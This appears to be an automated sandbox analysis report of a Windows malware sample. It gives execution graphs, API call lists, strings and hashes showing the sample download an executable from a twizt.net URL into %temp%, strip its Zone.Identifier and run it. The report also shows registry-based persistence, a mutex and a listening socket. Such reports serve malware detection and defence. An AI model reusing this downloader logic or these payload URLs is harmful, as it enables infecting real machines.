                                                                    execution_graph 286 9c15cf 287 9c15ea 286->287 288 9c15e3 _exit 286->288 289 9c15f3 _cexit 287->289 290 9c15f9 __onexit 287->290 288->287 289->290 291 9c1b48 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 292 9c1c3a GetCurrentProcess TerminateProcess 291->292 293 9c1c32 _crt_debugger_hook 291->293 293->292 268 9c15bb _XcptFilter 269 9c13fb 274 9c1807 269->274 272 9c1438 _amsg_exit 273 9c1440 272->273 277 9c1762 274->277 276 9c1400 __getmainargs 276->272 276->273 284 9c19cc 277->284 279 9c176e _decode_pointer 280 9c1785 _onexit 279->280 281 9c1791 7 API calls 279->281 283 9c17f5 __onexit 280->283 285 9c17fe _unlock 281->285 283->276 284->279 285->283 294 9c170b 295 9c1747 294->295 297 9c171d 294->297 296 9c1742 ?terminate@ 296->295 297->295 297->296 298 9c1a25 _except_handler4_common 299 9c1620 300 9c162e __set_app_type _encode_pointer __p__fmode __p__commode 299->300 302 9c16cd _pre_c_init __RTC_Initialize 300->302 303 9c16db __setusermatherr 302->303 304 9c16e7 302->304 303->304 309 9c1a4a _controlfp_s 304->309 307 9c16fe 308 9c16f5 _configthreadlocale 308->307 310 9c1a66 _invoke_watson 309->310 311 9c16ec 309->311 310->311 311->307 311->308 209 9c1441 229 9c19cc 209->229 211 9c144d GetStartupInfoA 212 9c147b 211->212 213 9c148d 212->213 214 9c1494 Sleep 212->214 215 9c14ad _amsg_exit 213->215 216 9c14b7 213->216 214->212 217 9c14e0 215->217 216->217 218 9c14c0 _initterm_e 216->218 219 9c14ef _initterm 217->219 220 9c150a 217->220 218->217 222 9c14db __onexit 218->222 219->220 221 9c150e InterlockedExchange 220->221 225 9c1516 __IsNonwritableInCurrentImage 220->225 221->225 223 9c15a5 _ismbblead 223->225 224 9c15ea 224->222 226 9c15f3 _cexit 224->226 225->223 225->224 228 9c158f exit 225->228 230 9c1380 Sleep 225->230 226->222 228->225 229->211 239 9c1120 7 API calls 230->239 234 9c139d 235 9c13de 234->235 236 9c13a1 InternetOpenA 234->236 235->225 237 9c13d9 InternetCloseHandle 236->237 238 9c13c2 InternetOpenUrlA InternetCloseHandle 236->238 237->235 238->237 240 9c12b9 InternetCloseHandle Sleep 239->240 241 9c11bb InternetOpenUrlW 239->241 242 9c12d8 6 API calls 240->242 243 9c1375 240->243 244 9c11dd CreateFileW 241->244 245 9c12b1 InternetCloseHandle 241->245 242->243 248 9c1343 wsprintfW DeleteFileW 242->248 258 9c1000 ExpandEnvironmentStringsW wsprintfW 243->258 246 9c12a4 CloseHandle 244->246 247 9c1202 InternetReadFile 244->247 245->240 246->245 249 9c125f CloseHandle wsprintfW DeleteFileW 247->249 250 9c1221 247->250 251 9c1080 4 API calls 248->251 264 9c1080 memset CreateProcessW 249->264 254 9c122f WriteFile InternetReadFile 250->254 255 9c125b 250->255 253 9c1372 251->253 253->243 254->250 254->255 255->249 256 9c1299 256->246 257 9c12a0 256->257 257->246 259 9c1043 258->259 260 9c1047 259->260 261 9c1050 CreateFileW 259->261 260->234 262 9c106f CloseHandle 261->262 263 9c1076 261->263 262->263 263->234 265 9c10e9 Sleep 264->265 266 9c10fb ShellExecuteW 264->266 265->256 266->265 267 9c1114 266->267 267->256 312 9c1701 315 9c1a78 312->315 314 9c1706 314->314 316 9c1a9d 315->316 317 9c1aaa GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 315->317 316->317 318 9c1aa1 316->318 317->318 318->314

                                                                    Callgraph

                                                                    Executed Functions

                                                                    Function 009C1120 Relevance: 57.9, APIs: 27, Strings: 6, Instructions: 186filenetworksleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 009C1129
                                                                    • srand.MSVCR90 ref: 009C1130
                                                                    • ExpandEnvironmentStringsW.KERNEL32 ref: 009C114F
                                                                    • rand.MSVCR90 ref: 009C1155
                                                                    • rand.MSVCR90 ref: 009C1169
                                                                    • wsprintfW.USER32 ref: 009C1195
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009C11A7
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009C11CD
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 009C11F1
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C121B
                                                                    • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 009C1240
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C1255
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 009C1260
                                                                    • wsprintfW.USER32 ref: 009C1278
                                                                    • DeleteFileW.KERNELBASE(?,?,?,?,?,?,%temp%,?,00000104), ref: 009C1289
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 009C12A5
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C12B2
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C12BA
                                                                    • Sleep.KERNELBASE(000003E8,?,?,%temp%,?,00000104), ref: 009C12CB
                                                                    • rand.MSVCR90 ref: 009C12D8
                                                                    • Sleep.KERNEL32 ref: 009C12E6
                                                                    • rand.MSVCR90 ref: 009C12E8
                                                                    • rand.MSVCR90 ref: 009C12FC
                                                                    • wsprintfW.USER32 ref: 009C1322
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 009C133A
                                                                    • wsprintfW.USER32 ref: 009C1355
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 009C1362
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 009C11A2
                                                                    • %s:Zone.Identifier, xrefs: 009C1272
                                                                    • %s\%d%d.exe, xrefs: 009C118F
                                                                    • %temp%, xrefs: 009C1145
                                                                    • %s\%d%d.exe, xrefs: 009C131C
                                                                    • %s:Zone.Identifier, xrefs: 009C134F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internet$rand$CloseHandlewsprintf$DeleteOpenReadSleep$CountCreateDownloadEnvironmentExpandStringsTickWritesrand
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                    • API String ID: 1566391613-1161929716
                                                                    • Opcode ID: 7b3b870e566ca4cb9bec787b02525999ea8132a09655bcbf49118f5a44b1a7df
                                                                    • Instruction ID: f36a87550353c0d538836ec31d629ac1756d751733ce0d3a55cb49ca529c58a0
                                                                    • Opcode Fuzzy Hash: 7b3b870e566ca4cb9bec787b02525999ea8132a09655bcbf49118f5a44b1a7df
                                                                    • Instruction Fuzzy Hash: 5651B571E48341ABE321E760DC86FAB33ADABC5704F00491EF645961C2EA78A604D777
                                                                    Function 009C1000 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 37fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009C1018
                                                                    • wsprintfW.USER32 ref: 009C1030
                                                                    • PathFileExistsW.KERNELBASE(00000000), ref: 009C103D
                                                                    • CreateFileW.KERNELBASE(40000000,40000000,00000000,00000000,00000001,00000002,00000000), ref: 009C1064
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 009C1070
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                    • String ID: %s\33573537.jpg$%temp%$^[w
                                                                    • API String ID: 750032643-3416933354
                                                                    • Opcode ID: bcb7fe91dd7029c8dfd00d6daf8464ad10a9cc15cdb355e21ee9b7be2537b355
                                                                    • Instruction ID: cc4eb8a6b9118c164adaa3a52a47e0080d1eb699ebbf1cdb1d7249189176658b
                                                                    • Opcode Fuzzy Hash: bcb7fe91dd7029c8dfd00d6daf8464ad10a9cc15cdb355e21ee9b7be2537b355
                                                                    • Instruction Fuzzy Hash: FDF0F0F4D183006BE630DB20DC4AFDA3368AB44704F80491AB365D10E2EBB49188DBA6
                                                                    Function 009C1380 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 35networksleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 009C1385
                                                                      • Part of subcall function 009C1120: GetTickCount.KERNEL32 ref: 009C1129
                                                                      • Part of subcall function 009C1120: srand.MSVCR90 ref: 009C1130
                                                                      • Part of subcall function 009C1120: ExpandEnvironmentStringsW.KERNEL32 ref: 009C114F
                                                                      • Part of subcall function 009C1120: rand.MSVCR90 ref: 009C1155
                                                                      • Part of subcall function 009C1120: rand.MSVCR90 ref: 009C1169
                                                                      • Part of subcall function 009C1120: wsprintfW.USER32 ref: 009C1195
                                                                      • Part of subcall function 009C1120: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009C11A7
                                                                      • Part of subcall function 009C1120: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009C11CD
                                                                      • Part of subcall function 009C1120: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 009C11F1
                                                                      • Part of subcall function 009C1120: InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C121B
                                                                      • Part of subcall function 009C1120: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 009C1240
                                                                      • Part of subcall function 009C1120: InternetReadFile.WININET(00000000,?,00000103,?), ref: 009C1255
                                                                      • Part of subcall function 009C1000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 009C1018
                                                                      • Part of subcall function 009C1000: wsprintfW.USER32 ref: 009C1030
                                                                      • Part of subcall function 009C1000: PathFileExistsW.KERNELBASE(00000000), ref: 009C103D
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009C13B0
                                                                    • InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 009C13D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C13D7
                                                                    • InternetCloseHandle.WININET(00000000), ref: 009C13DA
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 009C13AB
                                                                    • http://twizt.net/newtpp.exe, xrefs: 009C138B
                                                                    • http://twizt.net/peinstall.php, xrefs: 009C13CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$File$Open$CloseEnvironmentExpandHandleReadStringsrandwsprintf$CountCreateExistsPathSleepTickWritesrand
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/newtpp.exe$http://twizt.net/peinstall.php
                                                                    • API String ID: 2331825455-3619598175
                                                                    • Opcode ID: 7e2cb2a5850fb0a219bc87ef1c135da7d12fecec33d78265d5402818ff1a1d43
                                                                    • Instruction ID: 49ae7997469457134309860d2c48afc7b60fa640ded9cb4765ed83937568e60c
                                                                    • Opcode Fuzzy Hash: 7e2cb2a5850fb0a219bc87ef1c135da7d12fecec33d78265d5402818ff1a1d43
                                                                    • Instruction Fuzzy Hash: 34F06535FD535176E23177612C0BF4A15185BC2F55F150019F701B91C29AD4A401E6BF
                                                                    Function 009C1080 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52sleepprocessCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 35 9c1080-9c10e7 memset CreateProcessW 36 9c10e9-9c10fa Sleep 35->36 37 9c10fb-9c1112 ShellExecuteW 35->37 37->36 38 9c1114-9c111a 37->38
                                                                    APIs
                                                                    • memset.MSVCR90 ref: 009C108D
                                                                    • CreateProcessW.KERNELBASE ref: 009C10DE
                                                                    • Sleep.KERNELBASE(000003E8), ref: 009C10EE
                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 009C1109
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1477258605.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1477229625.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477318610.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1477337602.00000000009C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_9c0000_LM94OE0VNK.jbxd
                                                                    Similarity
                                                                    • API ID: CreateExecuteProcessShellSleepmemset
                                                                    • String ID: D$open
                                                                    • API String ID: 541629773-2491301029
                                                                    • Opcode ID: ec114391a3c48647faaea58aa493e31e4726f830c57a60dcd7ad3c774c7d27b8
                                                                    • Instruction ID: 797912bfa4c32fd2082de2a74e921a9840fb2ac7aa1fdfb5e6306ebe2e040809
                                                                    • Opcode Fuzzy Hash: ec114391a3c48647faaea58aa493e31e4726f830c57a60dcd7ad3c774c7d27b8
                                                                    • Instruction Fuzzy Hash: 04019671A843007AE320DF148C46F8B7BE4AF85B00F10481DF748AA1D1E7B09548CB9B

                                                                    Execution Graph

                                                                    Execution Coverage:0.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:16.7%
                                                                    Total number of Nodes:1437
                                                                    Total number of Limit Nodes:8
                                                                    execution_graph 5817 40cf00 5823 4021b0 5817->5823 5820 40cf3f 5821 40cf25 WaitForSingleObject 5827 401600 5821->5827 5824 4021cf 5823->5824 5825 4021bb 5823->5825 5824->5820 5824->5821 5825->5824 5848 402020 5825->5848 5828 40160d 5827->5828 5847 401737 5827->5847 5829 401619 EnterCriticalSection 5828->5829 5828->5847 5830 4016b5 LeaveCriticalSection SetEvent 5829->5830 5833 401630 5829->5833 5831 4016d0 5830->5831 5832 4016e8 5830->5832 5834 4016d6 PostQueuedCompletionStatus 5831->5834 5835 40d2d0 11 API calls 5832->5835 5833->5830 5836 401641 InterlockedDecrement 5833->5836 5838 40165a InterlockedExchangeAdd 5833->5838 5844 4016a0 InterlockedDecrement 5833->5844 5834->5832 5834->5834 5837 4016f3 5835->5837 5836->5833 5839 40d410 6 API calls 5837->5839 5838->5833 5840 40166d InterlockedIncrement 5838->5840 5841 4016fc CloseHandle CloseHandle WSACloseEvent 5839->5841 5842 401c50 4 API calls 5840->5842 5869 40ab40 shutdown closesocket 5841->5869 5842->5833 5844->5833 5845 401724 DeleteCriticalSection 5846 40a1b0 _invalid_parameter 3 API calls 5845->5846 5846->5847 5847->5820 5849 409d90 7 API calls 5848->5849 5850 40202b 5849->5850 5851 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5850->5851 5857 4021a5 5850->5857 5852 402076 CreateIoCompletionPort 5851->5852 5853 40219f 5851->5853 5852->5853 5854 40208f 5852->5854 5855 401600 35 API calls 5853->5855 5856 40d130 8 API calls 5854->5856 5855->5857 5858 402094 5856->5858 5857->5824 5858->5853 5859 40209f WSASocketA 5858->5859 5859->5853 5860 4020bd setsockopt htons bind 5859->5860 5860->5853 5861 402126 listen 5860->5861 5861->5853 5862 40213a WSACreateEvent 5861->5862 5862->5853 5863 402147 WSAEventSelect 5862->5863 5863->5853 5867 402159 5863->5867 5864 40217f 5866 40d160 16 API calls 5864->5866 5865 40d160 16 API calls 5865->5867 5868 402194 5866->5868 5867->5864 5867->5865 5868->5824 5869->5845 5344 406045 5346 405fbe 5344->5346 5345 40604a LeaveCriticalSection 5346->5345 5347 40a220 8 API calls 5346->5347 5348 40601c 5347->5348 5348->5345 5349 407b49 5350 407b52 5349->5350 5351 407b61 34 API calls 5350->5351 5352 408996 5350->5352 5882 40a28e 5883 40a1b0 _invalid_parameter 3 API calls 5882->5883 5886 40a24d 5883->5886 5884 40a262 5885 409fa0 __aligned_recalloc_base 7 API calls 5885->5886 5886->5884 5886->5885 5887 40a264 memcpy 5886->5887 5887->5886 4355 407590 Sleep CreateMutexA GetLastError 4356 4075c6 ExitProcess 4355->4356 4357 4075ce 6 API calls 4355->4357 4358 407673 4357->4358 4359 40795a Sleep 4357->4359 4411 40e730 GetLocaleInfoA strcmp 4358->4411 4419 40c7d0 4359->4419 4364 407ae1 4365 407975 9 API calls 4422 405bc0 InitializeCriticalSection CreateFileW 4365->4422 5237 407440 4365->5237 5244 405880 4365->5244 5253 406bc0 Sleep GetModuleFileNameW 4365->5253 4366 407680 ExitProcess 4367 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4369 407779 Sleep wsprintfW CopyFileW 4367->4369 4370 4076dc SetFileAttributesW RegOpenKeyExW 4367->4370 4371 4077c1 SetFileAttributesW RegOpenKeyExW 4369->4371 4372 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4369->4372 4370->4369 4374 407718 wcslen RegSetValueExW 4370->4374 4371->4372 4375 4077fd wcslen RegSetValueExW 4371->4375 4372->4359 4377 4078bd SetFileAttributesW RegOpenKeyExW 4372->4377 4374->4369 4378 40774d RegCloseKey 4374->4378 4375->4372 4379 407832 RegCloseKey 4375->4379 4377->4359 4381 4078f9 wcslen RegSetValueExW 4377->4381 4413 40e980 memset memset CreateProcessW 4378->4413 4383 40e980 6 API calls 4379->4383 4381->4359 4385 40792e RegCloseKey 4381->4385 4387 40784b 4383->4387 4389 40e980 6 API calls 4385->4389 4387->4372 4391 407856 ExitProcess 4387->4391 4388 407a2a CreateEventA 4452 40bf00 4388->4452 4393 407947 4389->4393 4390 407771 ExitProcess 4393->4359 4395 407952 ExitProcess 4393->4395 4402 40d160 16 API calls 4403 407a8a 4402->4403 4404 40d160 16 API calls 4403->4404 4405 407aa6 4404->4405 4406 40d160 16 API calls 4405->4406 4407 407ac2 4406->4407 4495 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4407->4495 4409 407ad2 4504 40d410 4409->4504 4412 407678 4411->4412 4412->4366 4412->4367 4414 40e9f1 ShellExecuteW 4413->4414 4415 40e9e2 Sleep 4413->4415 4417 40ea26 4414->4417 4418 40ea17 Sleep 4414->4418 4416 407766 4415->4416 4416->4369 4416->4390 4417->4416 4418->4416 4512 40c7a0 4419->4512 4423 405cd1 4422->4423 4424 405bf8 CreateFileMappingW 4422->4424 4434 40d640 CoInitializeEx 4423->4434 4424->4423 4425 405c19 MapViewOfFile 4424->4425 4425->4423 4426 405c38 GetFileSize 4425->4426 4430 405c4d 4426->4430 4427 405cc7 UnmapViewOfFile 4427->4423 4428 405c5c 4428->4427 4430->4427 4430->4428 4431 405c8c 4430->4431 4641 40c820 4430->4641 4648 405cf0 4430->4648 4432 40a1b0 _invalid_parameter 3 API calls 4431->4432 4432->4428 4952 40d710 socket 4434->4952 4436 407a25 4447 406fe0 CoInitializeEx SysAllocString 4436->4447 4437 40d660 4437->4436 4440 40d6aa 4437->4440 4446 40d6e8 4437->4446 4962 40d980 4437->4962 4977 40aa80 htons 4440->4977 4445 40e470 24 API calls 4445->4446 4996 40a2d0 4446->4996 4448 407002 4447->4448 4449 407018 CoUninitialize 4447->4449 5141 407030 4448->5141 4449->4388 5150 40bec0 4452->5150 4455 40bec0 3 API calls 4456 40bf1e 4455->4456 4457 40bec0 3 API calls 4456->4457 4458 40bf2e 4457->4458 4459 40bec0 3 API calls 4458->4459 4460 407a42 4459->4460 4461 40d130 4460->4461 4462 409d90 7 API calls 4461->4462 4463 40d13b 4462->4463 4464 407a4c 4463->4464 4465 40d147 InitializeCriticalSection 4463->4465 4466 40b2c0 InitializeCriticalSection 4464->4466 4465->4464 4471 40b2da 4466->4471 4467 40b309 CreateFileW 4469 40b330 CreateFileMappingW 4467->4469 4470 40b3de 4467->4470 4469->4470 4472 40b351 MapViewOfFile 4469->4472 5206 40ab60 EnterCriticalSection 4470->5206 4471->4467 5157 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4471->5157 5158 40aea0 4471->5158 4472->4470 4475 40b36c GetFileSize 4472->4475 4481 40b38b 4475->4481 4476 40b3f7 4477 40d160 16 API calls 4476->4477 4479 407a56 4477->4479 4478 40b3d4 UnmapViewOfFile 4478->4470 4483 40d160 4479->4483 4481->4478 4482 40aea0 31 API calls 4481->4482 5205 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4481->5205 4482->4481 4484 40d177 EnterCriticalSection 4483->4484 4485 407a6f 4483->4485 5233 40d250 4484->5233 4485->4402 4488 40d23b LeaveCriticalSection 4488->4485 4489 409fe0 9 API calls 4490 40d1b9 4489->4490 4490->4488 4491 40d1cb CreateThread 4490->4491 4491->4488 4492 40d1ee 4491->4492 4493 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4492->4493 4494 40d234 4492->4494 4493->4494 4494->4488 4496 40d306 InterlockedExchangeAdd 4495->4496 4497 40d3e9 GetCurrentThread SetThreadPriority 4495->4497 4496->4497 4502 40d320 4496->4502 4497->4409 4498 40d339 EnterCriticalSection 4498->4502 4499 40d3a7 LeaveCriticalSection 4499->4502 4503 40d3be 4499->4503 4500 40d383 WaitForSingleObject 4500->4502 4501 40d3dc Sleep 4501->4502 4502->4497 4502->4498 4502->4499 4502->4500 4502->4501 4502->4503 4503->4497 4505 40d492 4504->4505 4506 40d41c EnterCriticalSection 4504->4506 4505->4364 4507 40d438 LeaveCriticalSection DeleteCriticalSection 4506->4507 4509 40a1b0 _invalid_parameter 3 API calls 4507->4509 4510 40d486 4509->4510 4511 40a1b0 _invalid_parameter 3 API calls 4510->4511 4511->4505 4515 40c3f0 4512->4515 4516 40c40e 4515->4516 4519 40c423 4515->4519 4521 40c450 4516->4521 4518 40796a 4518->4364 4518->4365 4519->4518 4547 40c5d0 4519->4547 4522 40c479 4521->4522 4523 40c502 4521->4523 4546 40c4fa 4522->4546 4581 409d90 4522->4581 4525 409d90 7 API calls 4523->4525 4523->4546 4527 40c528 4525->4527 4529 402420 7 API calls 4527->4529 4527->4546 4531 40c555 4529->4531 4533 4024e0 10 API calls 4531->4533 4535 40c56f 4533->4535 4534 40c4cf 4536 402420 7 API calls 4534->4536 4538 402420 7 API calls 4535->4538 4537 40c4e0 4536->4537 4539 4024e0 10 API calls 4537->4539 4540 40c580 4538->4540 4539->4546 4541 4024e0 10 API calls 4540->4541 4542 40c59a 4541->4542 4543 402420 7 API calls 4542->4543 4544 40c5ab 4543->4544 4545 4024e0 10 API calls 4544->4545 4545->4546 4546->4518 4548 40c5f9 4547->4548 4549 40c6aa 4547->4549 4550 40c6a2 4548->4550 4551 409d90 7 API calls 4548->4551 4549->4550 4553 409d90 7 API calls 4549->4553 4550->4518 4552 40c60f 4551->4552 4552->4550 4555 402420 7 API calls 4552->4555 4554 40c6ce 4553->4554 4554->4550 4557 402420 7 API calls 4554->4557 4556 40c633 4555->4556 4558 409d90 7 API calls 4556->4558 4559 40c6f2 4557->4559 4560 40c642 4558->4560 4561 409d90 7 API calls 4559->4561 4562 4024e0 10 API calls 4560->4562 4563 40c701 4561->4563 4564 40c66b 4562->4564 4565 4024e0 10 API calls 4563->4565 4566 40a1b0 _invalid_parameter 3 API calls 4564->4566 4567 40c72a 4565->4567 4568 40c677 4566->4568 4569 40a1b0 _invalid_parameter 3 API calls 4567->4569 4570 402420 7 API calls 4568->4570 4571 40c736 4569->4571 4573 40c688 4570->4573 4572 402420 7 API calls 4571->4572 4574 40c747 4572->4574 4575 4024e0 10 API calls 4573->4575 4576 4024e0 10 API calls 4574->4576 4575->4550 4577 40c761 4576->4577 4578 402420 7 API calls 4577->4578 4579 40c772 4578->4579 4580 4024e0 10 API calls 4579->4580 4580->4550 4592 409db0 4581->4592 4584 402420 4613 409fa0 4584->4613 4589 4024e0 4620 402540 4589->4620 4591 4024ff __aligned_recalloc_base 4591->4534 4601 409e50 GetCurrentProcessId 4592->4601 4594 409dbb 4595 409dc7 __aligned_recalloc_base 4594->4595 4602 409e70 4594->4602 4596 409d9e 4595->4596 4598 409de2 HeapAlloc 4595->4598 4596->4546 4596->4584 4598->4596 4599 409e09 __aligned_recalloc_base 4598->4599 4599->4596 4600 409e24 memset 4599->4600 4600->4596 4601->4594 4610 409e50 GetCurrentProcessId 4602->4610 4604 409e79 4605 409e96 HeapCreate 4604->4605 4611 409ee0 GetProcessHeaps 4604->4611 4606 409eb0 HeapSetInformation GetCurrentProcessId 4605->4606 4607 409ed7 4605->4607 4606->4607 4607->4595 4610->4604 4612 409e8c 4611->4612 4612->4605 4612->4607 4614 409db0 __aligned_recalloc_base 7 API calls 4613->4614 4615 40242b 4614->4615 4616 402820 4615->4616 4617 40282a 4616->4617 4618 409fa0 __aligned_recalloc_base 7 API calls 4617->4618 4619 402438 4618->4619 4619->4589 4621 40258e 4620->4621 4623 402551 4620->4623 4622 409fa0 __aligned_recalloc_base 7 API calls 4621->4622 4621->4623 4626 4025b2 _invalid_parameter 4622->4626 4623->4591 4624 4025e2 memcpy 4625 402606 _invalid_parameter 4624->4625 4628 40a1b0 _invalid_parameter 3 API calls 4625->4628 4626->4624 4630 40a1b0 4626->4630 4628->4623 4637 409e50 GetCurrentProcessId 4630->4637 4632 40a1bb 4633 4025df 4632->4633 4638 40a0f0 4632->4638 4633->4624 4636 40a1d7 HeapFree 4636->4633 4637->4632 4639 40a120 HeapValidate 4638->4639 4640 40a140 4638->4640 4639->4640 4640->4633 4640->4636 4658 40a220 4641->4658 4644 40c861 4644->4430 4647 40a1b0 _invalid_parameter 3 API calls 4647->4644 4871 409fe0 4648->4871 4651 405d2a memcpy 4652 40a220 8 API calls 4651->4652 4653 405d61 4652->4653 4881 40c190 4653->4881 4656 405de8 4656->4430 4659 40a24d 4658->4659 4660 409fa0 __aligned_recalloc_base 7 API calls 4659->4660 4661 40a262 4659->4661 4662 40a264 memcpy 4659->4662 4660->4659 4661->4644 4663 40bd30 4661->4663 4662->4659 4666 40bd3a 4663->4666 4667 40bd71 memcmp 4666->4667 4668 40bd98 4666->4668 4670 40a1b0 _invalid_parameter 3 API calls 4666->4670 4671 40bd59 4666->4671 4672 40c220 4666->4672 4686 407af0 4666->4686 4667->4666 4669 40a1b0 _invalid_parameter 3 API calls 4668->4669 4669->4671 4670->4666 4671->4644 4671->4647 4673 40c22f __aligned_recalloc_base 4672->4673 4674 409fa0 __aligned_recalloc_base 7 API calls 4673->4674 4676 40c239 4673->4676 4675 40c2c8 4674->4675 4675->4676 4677 402420 7 API calls 4675->4677 4676->4666 4678 40c2dd 4677->4678 4679 402420 7 API calls 4678->4679 4680 40c2e5 4679->4680 4682 40c33d __aligned_recalloc_base 4680->4682 4689 40c390 4680->4689 4694 402470 4682->4694 4685 402470 3 API 